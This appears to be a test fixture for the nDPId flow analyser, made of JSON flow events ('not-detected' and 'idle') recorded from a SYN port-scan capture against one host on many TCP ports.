-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":254,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":255,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":254,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":255,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":256,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":256,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":264,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":264,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":264,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":264,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2323,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2323,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":280,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":280,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51493,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51493,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":306,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
